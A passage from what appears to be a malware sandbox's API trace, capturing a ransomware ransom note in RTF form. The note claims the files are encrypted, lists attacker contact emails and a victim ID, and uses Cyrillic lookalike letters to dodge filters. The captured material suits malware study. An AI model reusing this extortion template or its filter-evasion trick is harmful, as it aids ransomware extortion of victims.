br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s 